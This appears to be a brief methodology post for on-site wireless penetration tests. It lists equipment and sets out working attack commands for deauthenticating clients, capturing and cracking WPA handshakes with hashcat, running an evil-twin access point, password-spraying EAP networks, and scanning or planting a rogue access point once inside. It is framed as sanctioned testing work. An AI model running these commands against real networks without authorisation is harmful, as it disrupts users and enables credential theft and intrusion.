WiFi

Doing a Wireless Penetration Test

Make sure you have everything you’ll need, since these always need to be on-site.

  • Computer (even better to bring more than 1), with Kali Linux installed
  • Power cords
  • WiFi Card(s) – at least 1 since they don’t like to work when they need to
  • Different antennas
  • MiFi, since they’re probably not going to let you on the network so easily
  • USB Hub, as the wireless card might need extra power
  • OEM power cords
  • Power strip – there’s a lot to plug in

That’s a good start.

Thanks to Ted Raffle for this writeup.

Start up Kali, plug in the card, run iwconfig to see whether it is connected

Get rid of unnecessary processes: airmon-ng check kill

Start the interface: airmon-ng start wlan0

To see networks and their MAC: airodump-ng –band abg -cswitch 1 wlan0mon

If you need to de-auth: aireplay-ng –deauth <number of packets or 0 for infinite> -a [MAC of AP] -c [MAC of client] wlan0mon

Capture a PSK: airodump-ng wlan0mon -c 1 –bssid [MAC of AP] –write <filename>

Turn handshake value into a hashcat value: wpaclean clean.cap <filename>-01.cap

And: aircrack-ng clean.cap -J hccap

hashcat -m 2500 hccap.hccap -w wordlist rules/rule

Evil Twin:

Have mana installed

Use Nick Sanzotta’s “manaSucks” script:

python manaSucks.py -iwlan0mon -m=<fake MAC address> –hostname ‘anything’ -s<SSID> -c6 –manaloud=0

For brute forcing the EAP network, get usernames, either also from Nick Sanzotta’s WiFiSuite, or from evil twin, or from scraping, use WiFiSuite:

python wifisuite.py -iwlan0mon -s”<SSID>” -u <username file> -p<password> spray

If you get guest network access, test for network segmentation. nmap the neighborhood looking for “up” hosts. If there are any, nmap them for services. Also check for nameservers.

If you get on the corporate network with credentials, it’s essentially now an internal assessment. Pick something to show risk and move on. After all, it’s a wireless assessment.

Test outside the building for access

Plug in a wifi repeater/AP, is it detected? Are there network access controls? (Probably not, and now you have internal access)

Loading